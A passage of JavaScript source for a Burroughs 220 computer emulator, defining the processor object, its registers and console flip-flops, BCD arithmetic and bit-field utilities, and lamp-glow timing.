also: * * An Introduction to Coding the Burroughs 220 * (Bulletin 5019, Burroughs Corporation, December, 1958). * * Burroughs 220 word format: * 44 bits, encoded as binary-coded decimal (BCD); non-decimal codes are * invalid and cause the computer to stop with a Digit Check alarm, also known * as a Forbidden Combination (FC). * * High-order 4 bits are the "sign digit": * Low-order bit of this digit is the actual sign. * Higher-order bits are used in some I/O operations. * Remaining 40 bits are the value as: * 10 decimal digits as a fractional mantissa, with the decimal point * between the sign and high-order (10th) digits * a floating point value with the first two digits as the exponent (biased * by 50) followed by a fractional 8-digit mantissa * 5 two-digit character codes * one instruction word * * Instruction word format: * Low-order 4 digits: operand address * Next-higher 2 digits: operation code * Next-higher 4 digits: control and variant digits used by some instructions * Sign digit: odd value indicates the B register is to be added to the * operand address prior to execution. * * Processor timing is maintained internally in units of milliseconds. * ************************************************************************ * 2017-01-01 P.Kimpel * Original version, cloned from retro-205 emulator/D205Processor.js. ***********************************************************************/ "use strict"; /**************************************/ function B220Processor(config, devices) { /* Constructor for the 220 Processor module object */ var staticLampGlow = false; // compute fractional lamp glow (experimental) this.mnemonic = "CPU"; B220Processor.instance = this; // externally-available object reference (for DiagMonitor) // Emulator control this.cardatron = null; // reference to Cardatron Control Unit this.config = config; // reference to SystemConfig object this.console = null; // reference to Control Console for I/O this.devices = devices; // hash of I/O device objects this.ioCallback = null; // current I/O interface callback function this.magTape = null; // reference to Magnetic Tape Control Unit this.poweredOn = 0; // system is powered on and initialized this.successor = null; // current delayed-action successor function this.tracing = false; // emulator diagnostic tracing flag // Memory this.memorySize = config.getNode("memorySize"); // memory size, words this.bcdMemorySize = B220Processor.binaryBCD(this.memorySize); this.MM = new Float64Array(this.memorySize); // main memory, 11-digit words this.IB = new B220Processor.Register(11*4, this, true); // memory Input Buffer // Processor throttling control and timing statistics this.asyncTime = 0; // time for processor asynchronous operation during I/O this.execClock = 0; // emulated internal processor clock, ms this.execLimit = 0; // current time slice limit on this.execClock, ms this.instructionCount = 0; // total instructions executed this.opTime = 0; // estimated time for current instruction, ms this.procTimer = 0; // elapsed time that the processor has been running, ms this.procTime = 0; // total emulated running time for processor, ms this.runStamp = 0; // timestamp of start of last time slice, ms this.runTimer = 0; // elapsed run-time timer value, ms this.scheduler = 0; // current setCallback token this.procSlack = 0; // total processor throttling delay, ms this.procSlackAvg = 0; // average slack time per time slice, ms this.procRunAvg = 0; // average elapsed time per time slice, ms this.delayDeltaAvg = 0; // average difference between requested and actual setCallback() delays, ms this.delayLastStamp = 0; // timestamp of last setCallback() delay, ms this.delayRequested = 0; // last requested setCallback() delay, ms // Primary Registers this.A = new B220Processor.Register(11*4, this, staticLampGlow); this.B = new B220Processor.Register( 4*4, this, staticLampGlow); this.C = new B220Processor.Register(10*4, this, staticLampGlow); this.D = new B220Processor.Register(11*4, this, staticLampGlow); this.E = new B220Processor.Register( 4*4, this, staticLampGlow); this.P = new B220Processor.Register( 4*4, this, staticLampGlow); this.R = new B220Processor.Register(11*4, this, staticLampGlow); this.S = new B220Processor.Register( 4*4, this, staticLampGlow); // Register E decrements modulo the system memory size, so override dec(). this.E.dec = function decE() { if (this.value == 0) { this.value = this.p.bcdMemorySize; } return this.constructor.prototype.dec.apply(this); }; // Control Console Lamps this.digitCheckAlarm = new B220Processor.FlipFlop(this, staticLampGlow); this.systemNotReady = new B220Processor.FlipFlop(this, staticLampGlow); this.computerNotReady = new B220Processor.FlipFlop(this, staticLampGlow); this.compareLowLamp = new B220Processor.FlipFlop(this, staticLampGlow); this.compareEqualLamp = new B220Processor.FlipFlop(this, staticLampGlow); this.compareHighLamp = new B220Processor.FlipFlop(this, staticLampGlow); // Control Console Switches this.PC1SW = 0; // program control switches 1-10 this.PC2SW = 0; this.PC3SW = 0; this.PC4SW = 0; this.PC5SW = 0; this.PC6SW = 0; this.PC7SW = 0; this.PC8SW = 0; this.PC9SW = 0; this.PC0SW = 0; this.SONSW = 0; // S "On" switch this.SUNITSSW = 0; // S units switch this.STOCSW = 0; // S to C switch this.STOPSW = 0; // S to P switch // Left-Hand Maintenance Panel Switches this.HOLDPZTZEROSW = 0; this.LEADINGZEROESSW = 0; this.PAPERTAPESUMSW = 0; this.ORDERCOMPLEMENTSW = 0; this.MEMORYLOCKOUTSW = 0; this.DCLOCKOUTSW = 0; this.SPDPHOLDSW = 0; this.HOLDSEQUENCE1SW = 0; this.HOLDSEQUENCE2SW = 0; this.HOLDSEQUENCE4SW = 0; this.HOLDSEQUENCE8SW = 0; // Left-Hand Maintenance Panel Registers & Flip-Flops this.CI = new B220Processor.Register(5, this, staticLampGlow); // carry inverters this.DC = new B220Processor.Register(6, this, staticLampGlow); // digit counter (modulo 20) this.SC = new B220Processor.Register(4, this, staticLampGlow); // sequence counter this.SI = new B220Processor.Register(4, this, staticLampGlow); // sum inverters this.X = new B220Processor.Register(4, this, staticLampGlow); // adder X (augend) input this.Y = new B220Processor.Register(4, this, staticLampGlow); // adder Y (addend) input this.Z = new B220Processor.Register(4, this, staticLampGlow); // decimal sum inverters, adder output this.CI.checkFC = B220Processor.emptyFunction; // these registers generate A-F undigits this.SI.checkFC = B220Processor.emptyFunction; this.C10 = new B220Processor.FlipFlop(this, staticLampGlow); // decimal carry toggle this.DST = new B220Processor.FlipFlop(this, staticLampGlow); // D-sign toggle this.LT1 = new B220Processor.FlipFlop(this, staticLampGlow); // logical toggle 1 this.LT2 = new B220Processor.FlipFlop(this, staticLampGlow); // logical toggle 2 this.LT3 = new B220Processor.FlipFlop(this, staticLampGlow); // logical toggle 3 this.SCI = new B220Processor.FlipFlop(this, staticLampGlow); // sequence counter inverter this.SGT = new B220Processor.FlipFlop(this, staticLampGlow); // sign toggle this.SUT = new B220Processor.FlipFlop(this, staticLampGlow); // subtract toggle this.TBT = new B220Processor.FlipFlop(this, staticLampGlow); // tape busy toggle this.TCT = new B220Processor.FlipFlop(this, staticLampGlow); // tape clock toggle this.TPT = new B220Processor.FlipFlop(this, staticLampGlow); // tape pulse toggle this.TWT = new B220Processor.FlipFlop(this, staticLampGlow); // tape write toggle // Right-Hand Maintenance Panel Switches this.MULTIPLEACCESSSW = 0; this.V1V2V3COUNTSW = 0; this.AUDIBLEALARMSW = 0; this.PCOUNTSW = 0; this.DIGITCHECKSW = 0; this.ALARMSW = 0; this.ADCOUNTSW = 0; this.IDLEALARMSW = 0; this.FREQUENCYSELECTSW = 0; this.SINGLEPULSESW = 0; this.FETCHEXECUTELOCKSW = 0; // Right-Hand Maintenance Panel Registers & Flip-Flops this.AX = new B220Processor.Register(10, this, staticLampGlow); // A exponent register this.BI = new B220Processor.Register( 8, this, staticLampGlow); // paper tape buffer inverters this.DX = new B220Processor.Register( 8, this, staticLampGlow); // D exponent register this.PA = new B220Processor.Register( 8, this, staticLampGlow); // PA register this.ALT = new B220Processor.FlipFlop(this, staticLampGlow); // program check alarm toggle this.AST = new B220Processor.FlipFlop(this, staticLampGlow); // asynchronous toggle this.CCT = new B220Processor.FlipFlop(this, staticLampGlow); // ?? toggle this.CRT = new B220Processor.FlipFlop(this, staticLampGlow); // Cardatron alarm toggle this.DPT = new B220Processor.FlipFlop(this, staticLampGlow); // decimal point toggle (SPO) this.EWT = new B220Processor.FlipFlop(this, staticLampGlow); // end of word toggle this.EXT = new B220Processor.FlipFlop(this, staticLampGlow); // fetch(0)/execute(1) toggle this.HAT = new B220Processor.FlipFlop(this, staticLampGlow); // high-speed printer alarm toggle this.HCT = new B220Processor.FlipFlop(this, staticLampGlow); // halt control toggle, for SOR, SOH, IOM this.HIT = new B220Processor.FlipFlop(this, staticLampGlow); // high comparison toggle this.MAT = new B220Processor.FlipFlop(this, staticLampGlow); // multiple access toggle this.MET = new B220Processor.FlipFlop(this, staticLampGlow); // memory (storage) alarm toggle this.MNT = new B220Processor.FlipFlop(this, staticLampGlow); // manual toggle this.OFT = new B220Processor.FlipFlop(this, staticLampGlow); // overflow toggle this.PAT = new B220Processor.FlipFlop(this, staticLampGlow); // paper tape alarm toggle this.PRT = new B220Processor.FlipFlop(this, staticLampGlow); // paper tape read toggle this.PZT = new B220Processor.FlipFlop(this, staticLampGlow); // paper tape zone toggle this.RPT = new B220Processor.FlipFlop(this, staticLampGlow); // repeat toggle this.RUT = new B220Processor.FlipFlop(this, staticLampGlow); // run toggle this.SST = new B220Processor.FlipFlop(this, staticLampGlow); // single-step toggle this.TAT = new B220Processor.FlipFlop(this, staticLampGlow); // magnetic tape alarm toggle this.UET = new B220Processor.FlipFlop(this, staticLampGlow); // unequal comparison toggle (HIT=UET=0 => off) // Left/Right Maintenance Panel this.leftPanelOpen = false; this.rightPanelOpen = false; // Context-bound routines this.boundConsoleOutputSign = B220Processor.prototype.consoleOutputSign.bind(this); this.boundConsoleOutputChar = B220Processor.prototype.consoleOutputChar.bind(this); this.boundConsoleOutputFinished = B220Processor.prototype.consoleOutputFinished.bind(this); this.boundConsoleInputReceiveChar = B220Processor.prototype.consoleInputReceiveChar.bind(this); this.boundConsoleInputInitiateNormal = B220Processor.prototype.consoleInputInitiateNormal.bind(this); this.boundConsoleInputInitiateInverse = B220Processor.prototype.consoleInputInitiateInverse.bind(this); this.boundCardatronOutputWord= B220Processor.prototype.cardatronOutputWord.bind(this); this.boundCardatronOutputFinished = B220Processor.prototype.cardatronOutputFinished.bind(this); this.boundCardatronReceiveWord = B220Processor.prototype.cardatronReceiveWord.bind(this); this.boundMagTapeComplete = B220Processor.prototype.magTapeComplete.bind(this); this.boundMagTapeReceiveWord = B220Processor.prototype.magTapeReceiveWord.bind(this); this.boundMagTapeSendWord = B220Processor.prototype.magTapeSendWord.bind(this); this.boundIoComplete = B220Processor.prototype.ioComplete.bind(this); this.clear(); // Create and initialize the processor state this.loadDefaultProgram(); // Preload a default program } /*********************************************************************** * Global Constants * ***********************************************************************/ B220Processor.version = "1.03"; B220Processor.tick = 1000/200000; // milliseconds per clock cycle (200KHz) B220Processor.cyclesPerMilli = 1/B220Processor.tick; // clock cycles per millisecond (200 => 200KHz) B220Processor.timeSlice = 13; // maximum processor time slice, ms B220Processor.delayAlpha = 0.000001; // decay factor for exponential weighted average delay B220Processor.delayAlpha1 = 1-B220Processor.delayAlpha; B220Processor.slackAlpha = 0.000001; // decay factor for exponential weighted average slack B220Processor.slackAlpha1 = 1-B220Processor.slackAlpha; B220Processor.neonPersistence = 7; // persistence of neon bulb glow [ms] B220Processor.maxGlowTime = B220Processor.neonPersistence; // panel bulb glow persistence [ms] B220Processor.adderGlowAlpha = B220Processor.neonPersistence/12; // adder and carry toggle glow decay factor, // based on one digit (1/12 word) time [ms] B220Processor.pow2 = [ // powers of 2 from 0 to 52 0x1, 0x2, 0x4, 0x8, 0x10, 0x20, 0x40, 0x80, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000, 0x4000, 0x8000, 0x10000, 0x20000, 0x40000, 0x80000, 0x100000, 0x200000, 0x400000, 0x800000, 0x1000000, 0x2000000, 0x4000000, 0x8000000, 0x10000000, 0x20000000, 0x40000000, 0x80000000, 0x100000000, 0x200000000, 0x400000000, 0x800000000, 0x1000000000, 0x2000000000, 0x4000000000, 0x8000000000, 0x10000000000, 0x20000000000, 0x40000000000, 0x80000000000, 0x100000000000, 0x200000000000, 0x400000000000, 0x800000000000, 0x1000000000000, 0x2000000000000, 0x4000000000000, 0x8000000000000, 0x10000000000000]; B220Processor.mask2 = [ // (2**n)-1 for n from 0 to 52 0x0, 0x1, 0x3, 0x7, 0x0F, 0x1F, 0x3F, 0x7F, 0x0FF, 0x1FF, 0x3FF, 0x7FF, 0x0FFF, 0x1FFF, 0x3FFF, 0x7FFF, 0x0FFFF, 0x1FFFF, 0x3FFFF, 0x7FFFF, 0x0FFFFF, 0x1FFFFF, 0x3FFFFF, 0x7FFFFF, 0x0FFFFFF, 0x1FFFFFF, 0x3FFFFFF, 0x7FFFFFF, 0x0FFFFFFF, 0x1FFFFFFF, 0x3FFFFFFF, 0x7FFFFFFF, 0x0FFFFFFFF, 0x1FFFFFFFF, 0x3FFFFFFFF, 0x7FFFFFFFF, 0x0FFFFFFFFF, 0x1FFFFFFFFF, 0x3FFFFFFFFF, 0x7FFFFFFFFF, 0x0FFFFFFFFFF, 0x1FFFFFFFFFF, 0x3FFFFFFFFFF, 0x7FFFFFFFFFF, 0x0FFFFFFFFFFF, 0x1FFFFFFFFFFF, 0x3FFFFFFFFFFF , 0x7FFFFFFFFFFF, 0x0FFFFFFFFFFFF, 0x1FFFFFFFFFFFF, 0x3FFFFFFFFFFFF, 0x7FFFFFFFFFFFF, 0x0FFFFFFFFFFFFF] ; B220Processor.multiplyDigitCounts = [1, 14, 27, 40, 53, 66, 65, 52, 39, 26]; /*********************************************************************** * Utility Functions * ***********************************************************************/ /**************************************/ B220Processor.emptyFunction = function emptyFunction() { /* A function that does nothing, used for overriding object methods */ return; }; /**************************************/ B220Processor.bcdBinary = function bcdBinary(v) { /* Converts the BCD value "v" to a binary number and returns it. If a BCD digit is not decimal, coerces it to an 8 or 9 instead */ var d; var power = 1; var result = 0; while(v) { d = v % 0x10; v = (v-d)/0x10; if (d > 9) { d &= 0x09; // turn off the middle 2 bits } result += d*power; power *= 10; } return result; }; /**************************************/ B220Processor.binaryBCD = function binaryBCD(v) { /* Converts the binary value "v" to a BCD number and returns it */ var d; var power = 1; var result = 0; while(v) { d = v % 10; result += d*power; power *= 0x10; v = (v-d)/10; } return result; }; /**************************************/ B220Processor.padLeft = function padLeft(v, digits, pad) { /* Converts "v" to a string if necessary and formats to a total length of "digits," padding with the "pad" character on the left. Used only for debug */ var padChar = (pad || "0").toString(); var s = v.toString(); var len = s.length; if (len > digits) { s = s.substring(len-digits); } else { while (len < digits) { s = padChar + s; ++len; } } return s; }; /**************************************/ B220Processor.formatWord = function formatWord(w) { /* Formats the BCD value of 220 word "w" as the customary "9 9999 99 9999" */ var s = B220Processor.padLeft(w.toString(16), 11); return s.substring(0, 1) + " " + s.substring(1, 5) + " " + s.substring(5, 7) + " " + s.substring(7); }; /*********************************************************************** * Bit and Field Manipulation Functions * ***********************************************************************/ /**************************************/ B220Processor.bitTest = function bitTest(word, bit) { /* Extracts and returns the specified bit from the word */ var p; // bottom portion of word power of 2 if (bit > 0) { return ((word - word % (p = B220Processor.pow2[bit]))/p) % 2; } else { return word % 2; } }; /**************************************/ B220Processor.bitSet = function bitSet(word, bit) { /* Sets the specified bit in word and returns the updated word */ var ue = bit+1; // word upper power exponent var bpower = // bottom portion of word power of 2 B220Processor.pow2[bit]; var bottom = // unaffected bottom portion of word (bit <= 0 ? 0 : (word % bpower)); var top = // unaffected top portion of word word - (word % B220Processor.pow2[ue]); return bpower + top + bottom; }; /**************************************/ B220Processor.bitReset = function bitReset(word, bit) { /* Resets the specified bit in word and returns the updated word */ var ue = bit+1; // word upper power exponent var bottom = // unaffected bottom portion of word (bit <= 0 ? 0 : (word % B220Processor.pow2[bit])); var top = // unaffected top portion of word word - (word % B220Processor.pow2[ue]); return top + bottom; }; /**************************************/ B220Processor.bitFlip = function bitFlip(word, bit) { /* Complements the specified bit in word and returns the updated word */ var ue = bit+1; // word upper power exponent var bpower = // bottom portion of word power of 2 B220Processor.pow2[bit]; var bottom = // unaffected bottom portion of word (bit <= 0 ? 0 : (word % bpower)); var middle = // bottom portion of word starting with affected bit word % B220Processor.pow2[ue]; var top = word - middle; // unaffected top portion of word if (middle >= bpower) { // if the affected bit is a one return top + bottom; // return the result with it set to zero } else { // otherwise return bpower + top + bottom; // return the result with it set to one } }; /**************************************/ B220Processor.fieldIsolate = function fieldIsolate(word, start, width) { /* Extracts a bit field [start:width] from word and returns the field */ var le = start-width+1; // lower power exponent var p; // bottom portion of word power of 2 return (le <= 0 ? word : (word - word % (p = B220Processor.pow2[le]))/p ) % B220Processor.pow2[width]; }; /**************************************/ B220Processor.fieldInsert = function fieldInsert(word, start, width, value) { /* Inserts a bit field from the low-order bits of value ([48-width:width]) into word.[start:width] and returns the updated word */ var ue = start+1; // word upper power exponent var le = ue-width; // word lower power exponent var bpower = // bottom portion of word power of 2 B220Processor.pow2[le]; var bottom = // unaffected bottom portion of word (le <= 0 ? 0 : (word % bpower)); var top = // unaffected top portion of word (ue <= 0 ? 0 : (word - (word % B220Processor.pow2[ue]))); return (value % B220Processor.pow2[width])*bpower + top + bottom; }; /**************************************/ B220Processor.fieldTransfer = function fieldTransfer(word, wstart, width, value, vstart) { /* Inserts a bit field from value.[vstart:width] into word.[wstart:width] and returns the updated word */ var ue = wstart+1; // word upper power exponent var le = ue-width; // word lower power exponent var ve = vstart-width+1; // value lower power exponent var vpower; // bottom port of value power of 2 var bpower = // bottom portion of word power of 2 B220Processor.pow2[le]; var bottom = // unaffected bottom portion of word (le <= 0 ? 0 : (word % bpower)); var top = // unaffected top portion of word (ue <= 0 ? 0 : (word - (word % B220Processor.pow2[ue]))); return ((ve <= 0 ? value : (value - value % (vpower = B220Processor.pow2[ve]))/vpower ) % B220Processor.pow2[width] )*bpower + top + bottom; }; /*********************************************************************** * System Clear & Lamp Glow Management * ***********************************************************************/ /**************************************/ B220Processor.prototype.clear = function clear() { /* Initializes (and if necessary, creates) the processor state */ // Primary Registers this.A.set(0); this.B.set(0); this.C.set(0); this.D.set(0); this.E.set(0); this.P.set(0); this.R.set(0); this.S.set(0); this.IB.set(0); // Control Console Lamps this.digitCheckAlarm.set(0); this.systemNotReady.set(0); this.computerNotReady.set(0); this.compareLowLamp.set(0); this.compareEqualLamp.set(0); this.compareHighLamp.set(0); // Left-Hand Maintenance Panel Registers & Flip-Flops this.CI.set(0); this.DC.set(0); this.SC.set(0); this.SI.set(0); this.X.set(0); this.Y.set(0); this.Z.set(0); this.C10.set(0); this.DST.set(0); this.LT1.set(0); this.LT2.set(0); this.LT3.set(0); this.SCI.set(0); this.SGT.set(0); this.SUT.set(0); this.TBT.set(0); this.TCT.set(0); this.TPT.set(0); this.TWT.set(0); // Right-Hand Maintenance Panel Registers & Flip-Flops this.AX.set(0); this.BI.set(0); this.DX.set(0); this.PA.set(0); this.ALT.set(0); this.AST.set(0); this.CCT.set(0); this.CRT.set(0); this.DPT.set(0); this.EWT.set(0); this.EXT.set(this.FETCHEXECUTELOCKSW == 2 ? 1 : 0); this.HAT.set(0); this.HCT.set(0); this.HIT.set(0); this.MAT.set(0); this.MET.set(0); this.MNT.set(0); this.OFT.set(0); this.PAT.set(0); this.PRT.set(0); this.PZT.set(0); this.RPT.set(0); this.RUT.set(0); this.SST.set(0); this.TAT.set(0); this.UET.set(0); this.CCONTROL = 0; // copy of C register control digits (4 digits) this.COP = 0; // copy of C register op code (2 digits) this.CADDR = 0; // copy of C register operand address (4 digits) // I/O globals this.rDigit = 0; // variant/format digit from control part of instruction this.vDigit = 0; // variant digit from control part of instruction this.selectedUnit = 0; // currently-selected unit number // Kill any pending action that may be in process if (this.scheduler) { clearCallback(this.scheduler); this.scheduler = 0; } this.updateLampGlow(1); // initialize the lamp states }; /**************************************/ B220Processor.prototype.validateDigitCheck = function validateDigitCheck() { /* Steps through all of the properties of the Processor object, isolating the Register() objects and determining if any of them have a Forbidden Combination condition. If not, turns off the Digit Check alarm */ var alarm = false; // true if any register has FC var name = ""; // current property name var reg = null; // current Register object for (name in this) { reg = this[name]; if (reg instanceof B220Processor.Register) { if (reg.hasFC) { alarm = true; break; // out of for loop } } } // for name if (!alarm) { this.digitCheckAlarm.set(0); } }; /**************************************/ B220Processor.prototype.updateLampGlow = function updateLampGlow(beta) { /* Updates the lamp glow for all registers and flip-flops in the system. Beta is a bias in the range (0,1). For normal update use 0; to freeze the current state in the lamps use 1 */ var gamma = (this.RUT.value ? beta || 0 : 1); // First, check whether a Digit Check alarm exists and if the condition has resolved. if (this.digitCheckAlarm.value) { this.validateDigitCheck(); } // Primary Registers this.A.updateLampGlow(gamma); this.B.updateLampGlow(gamma); this.C.updateLampGlow(gamma); this.D.updateLampGlow(gamma); this.E.updateLampGlow(gamma); this.P.updateLampGlow(gamma); this.R.updateLampGlow(gamma); this.S.updateLampGlow(gamma); this.IB.updateLampGlow(gamma); // Control Console Lamps this.digitCheckAlarm.updateLampGlow(gamma); this.systemNotReady.updateLampGlow(gamma); this.computerNotReady.updateLampGlow(gamma); this.compareLowLamp.updateLampGlow(gamma); this.compareEqualLamp.updateLampGlow(gamma); this.compareHighLamp.updateLampGlow(gamma); // Left-Hand Maintenance Panel Registers & Flip-Flops if (this.leftPanelOpen) { this.CI.updateLampGlow(gamma); this.DC.updateLampGlow(gamma); this.SC.updateLampGlow(gamma); this.SI.updateLampGlow(gamma); this.X.updateLampGlow(gamma); this.Y.updateLampGlow(gamma); this.Z.updateLampGlow(gamma); this.C10.updateLampGlow(gamma); this.DST.updateLampGlow(gamma); this.LT1.updateLampGlow(gamma); this.LT2.updateLampGlow(gamma); this.LT3.updateLampGlow(gamma); this.SCI.updateLampGlow(gamma); this.SGT.updateLampGlow(gamma); this.SUT.updateLampGlow(gamma); this.TBT.updateLampGlow(gamma); this.TCT.updateLampGlow(gamma); this.TPT.updateLampGlow(gamma); this.TWT.updateLampGlow(gamma); } // Right-Hand Maintenance Panel Registers & Flip-Flops this.ALT.updateLampGlow(gamma); this.MET.updateLampGlow(gamma); this.TAT.updateLampGlow(gamma); this.PAT.updateLampGlow(gamma); this.CRT.updateLampGlow(gamma); this.HAT.updateLampGlow(gamma); this.EXT.updateLampGlow(gamma); this.OFT.updateLampGlow(gamma); this.RPT.updateLampGlow(gamma); this.RUT.updateLampGlow(gamma); if (this.rightPanelOpen) { this.AX.updateLampGlow(gamma); this.BI.updateLampGlow(gamma); this.DX.updateLampGlow(gamma); this.PA.updateLampGlow(gamma); this.AST.updateLampGlow(gamma); this.CCT.updateLampGlow(gamma); this.CRT.updateLampGlow(gamma); this.DPT.updateLampGlow(gamma); this.EWT.updateLampGlow(gamma); this.HCT.updateLampGlow(gamma); this.HIT.updateLampGlow(gamma); this.MAT.updateLampGlow(gamma); this.MNT.updateLampGlow(gamma); this.PRT.updateLampGlow(gamma); this.PZT.updateLampGlow(gamma); this.SST.updateLampGlow(gamma); this.UET.updateLampGlow(gamma); } }; /**************************************/ B220Processor.prototype.asyncOff = function asyncOff() { /* Updates the emulated processor clock while operating asynchronously during I/O so that glow averages can be updated based on elapsed time. Also used at the end of and I/O to synchronize the emulated clock with real time */ if (this.asyncTime < 0) { this.asyncTime += performance.now(); this.execClock += this.asyncTime; this.procSlack += this.asyncTime; // consider I/O time to be processor slack } }; /**************************************/ B220Processor.prototype.asyncOn = function asyncOn() { /* Sets this.asyncTime to start asynchronous timing for the processor during I/O */ if (this.asyncTime >= 0) { this.asyncTime = -performance.now(); } }; /**************************************/ B220Processor.prototype.procOff = function procOff() { /* Stops emulated internal run timing for the processor */ while (this.procTime < 0) { this.procTime += this.execClock; } }; /**************************************/ B220Processor.prototype.procOn = function procOn() { /* Starts emulated internal run timing for the processor */ while (this.procTime >= 0) { this.procTime -= this.execClock; } }; /*********************************************************************** * Generic Register Class * ***********************************************************************/ B220Processor.Register = function Register(bits, p, invisible) { /* Constructor for the generic Register class. Defines a binary register of "bits" bits. "p" is a reference to the Processor object, used to access the timing members. "invisible" should be true if the register does not have a visible presence in the UI -- this will inhibit computing average lamp glow values for the register. Note that it is important to increment this.execClock in the caller AFTER setting new values in registers and flip-flops. This allows the average intensity to be computed based on the amount of time a bit was actually in that state */ this.bits = bits; // number of bits in register this.visible = (invisible ? false : true); this.hasFC = false; // true if Forbidden Combination (A-F digit) detected this.lastExecClock = 0; // time register was last set this.p = p; // processor instance this.value = 0; // binary value of register: read-only externally this.glow = new Float64Array(bits); // average lamp glow values }; /**************************************/ B220Processor.Register.prototype.checkFC = function checkFC() { /* Checks the register for a Forbidden Combination (hex A-F) digit. If at least one exists, sets the Digit Check alarm and returns true. The bit mask operations are done 28 bits at a time to avoid problems with the 32-bit 2s-complement arithmetic used by Javascript for bit operations */ var hasFC = false; // true if register has Forbidden Combination var v1 = this.value; // high-order digits (eventually) var v2 = v1%0x10000000; // low-order 7 digits v1 = (v1-v2)/0x10000000; if (((v2 & 0x8888888) >>> 3) & (((v2 & 0x4444444) >>> 2) | ((v2 & 0x2222222) >>> 1))) { hasFC = true; } else if (v1 > 9) { if (((v1 & 0x8888888) >>> 3) & (((v1 & 0x4444444) >>> 2) | ((v1 & 0x2222222) >>> 1))) { hasFC = true; } } this.hasFC = hasFC; if (!hasFC) { return 0; } else { this.p.setDigitCheck(1); return 1; } }; /**************************************/ B220Processor.Register.prototype.updateLampGlow = function updateLampGlow(beta) { /* Updates the lamp glow averages based on this.p.execClock. Note that the glow is always aged by at least one clock tick. Beta is a bias in the range (0,1). For normal update, use 0; to freeze the current state, use 1 */ var alpha = Math.min(Math.max(this.p.execClock-this.lastExecClock, B220Processor.tick)/ B220Processor.maxGlowTime + beta, 1.0); var alpha1 = 1.0-alpha; var b = 0; var bit; var v = this.value; if (this.visible) { while (v) { bit = v % 2; v = (v-bit)/2; this.glow[b] = this.glow[b]*alpha1 + bit*alpha; ++b; } while (b < this.bits) { this.glow[b] *= alpha1; ++b; } } this.lastExecClock = this.p.execClock; }; /**************************************/ B220Processor.Register.prototype.set = function set(value) { /* Set a binary value into the register. Use this rather than setting the value member directly so that average lamp glow can be computed. Returns the new value */ this.value = value; if (this.visible) { this.updateLampGlow(0); } if (value > 9) { this.checkFC(); } else { this.hasFC = false; } return value; }; /**************************************/ B220Processor.Register.prototype.getDigit = function getDigit(digitNr) { /* Returns the value of a 4-bit digit in the register. Digits are numbered from 0 starting at the low end (not the way the 220 numbers them) */ return B220Processor.fieldIsolate(this.value, digitNr*4+3, 4); }; /**************************************/ B220Processor.Register.prototype.setDigit = function setDigit(digitNr, value) { /* Sets the value of a 4-bit digit in the register. Digits are numbered from 0 starting at the low end (not the way the 220 numbers them) */ return this.set(B220Processor.fieldInsert(this.value, digitNr*4+3, 4, value)); }; /**************************************/ B220Processor.Register.prototype.getBit = function getBit(bitNr) { /* Returns the value of a bit in the register */ return (bitNr < this.bits ? B220Processor.bitTest(this.value, bitNr) : 0); }; /**************************************/ B220Processor.Register.prototype.setBit = function setBit(bitNr, value) { /* Set a bit on or off in the register. Returns the new register value. Note that the glow is always aged by at least one clock tick */ var alpha = Math.min(Math.max(this.p.execClock-this.lastExecClock, B220Processor.tick)/ B220Processor.maxGlowTime, 1.0); var bit = (value ? 1 : 0); if (bitNr < this.bits) { // Update the lamp glow for the former state. if (this.visible) { this.glow[bitNr] = this.glow[bitNr]*(1.0-alpha) + bit*alpha; } // Set the new state. this.value = (bit ? B220Processor.bitSet(this.value, bitNr) : B220Processor.bitReset(this.value, bitNr)); } this.checkFC(); return this.value; }; /**************************************/ B220Processor.Register.prototype.flipBit = function flipBit(bitNr) { /* Complements a bit in the register. Returns the new register value. Note that the glow is always aged by at least one clock tick */ var alpha = Math.min(Math.max(this.p.execClock-this.lastExecClock, B220Processor.tick)/ B220Processor.maxGlowTime, 1.0); var bit; if (bitNr < this.bits) { bit = 1 - B220Processor.bitTest(this.value, bitNr); // Update the lamp glow for the former state. if (this.visible) { this.glow[bitNr] = this.glow[bitNr]*(1.0-alpha) + bit*alpha; } // Set the new state. this.value = B220Processor.bitFlip(this.value, bitNr); } this.checkFC(); return this.value; }; /**************************************/ B220Processor.Register.prototype.add = function add(addend) { /* Adds "addend" to the current register value without regard to sign, discarding any overflow beyond the number of bits defined for the register. Returns the new register value. NOTE THAT THE ADDEND IS IN BCD, NOT BINARY. Also note that this uses the 220 adder, so generally do not use this for simple increment of address and counter registers -- use .inc() instead */ var digits = (this.bits+3) >> 2; return this.set(this.p.bcdAdd(this.value, addend, digits) % B220Processor.pow2[this.bits]); }; /**************************************/ B220Processor.Register.prototype.sub = function sub(subtrahend) { /* Subtracts "subtrahend" from the current register value without regard to sign, discarding any overflow beyond the number of bits defined for the register. Returns the new register value. NOTE THAT THE ADDEND IS IN BCD, NOT BINARY. Also note that this uses the 220 adder, so generally do not use this for simple decrement of address and counter registers -- use .dec() instead */ var digits = (this.bits+3) >> 2; return this.set(this.p.bcdAdd(subtrahend, this.value, digits, 1, 1) % B220Processor.pow2[this.bits]); }; /**************************************/ B220Processor.Register.prototype.inc = function inc() { /* Increments the register by 1 using BCD arithmetic and returns the new register value. This method does not use the 220 adder, so is safe to use for incrementing address and counter registers during instructions. Any overflow is discarded and the register wraps around to zero */ var d = this.value%0x10; // current low-order digit var maxPower = B220Processor.pow2[this.bits]; var power = 1; // factor for current digit position var w = this.value; // working copy of register value while (d == 9 && power < maxPower) {// while a carry would be generated this.value -= 9*power; // change this digit to a zero power *= 0x10; // bump power for next digit w = (w-d)/0x10; // shift working copy down d = w%0x10; // isolate the next digit } if (d < 9) { this.value += power; // increment the first digit that will not generate carry } return this.set(this.value % B220Processor.pow2[this.bits]); }; /**************************************/ B220Processor.Register.prototype.dec = function dec() { /* Decrements the register by 1 using BCD arithmetic and returns the new register value. This method does not use the 220 adder, so is safe to use for decrementing address and counter registers during instructions. Any underflow is discarded and the register wraps around to all-nines */ var d = this.value%0x10; // current low-order digit var maxPower = B220Processor.pow2[this.bits]; var power = 1; // factor for current digit position var w = this.value; // working copy of register value while (d == 0 && power < maxPower) {// while a borrow would be generated this.value += 9*power; // change this digit to a 9 power *= 0x10; // bump power for next digit w = (w-d)/0x10; // shift working copy down d = w%0x10; // isolate the next digit } if (d > 0) { this.value -= power; // decrement the first digit that will not generate a borrow } return this.set(this.value % maxPower); }; /*********************************************************************** * Generic Flip-Flop Class * ***********************************************************************/ B220Processor.FlipFlop = function FlopFlop(p, invisible) { /* Constructor for the generaic FlipFlop class. "p" is a reference to the Processor object, used to access the timing members. "invisible" should be true if the FF does not have a visible presence in the UI -- this will inhibit computing the average lamp glow value for it. Note that it is important 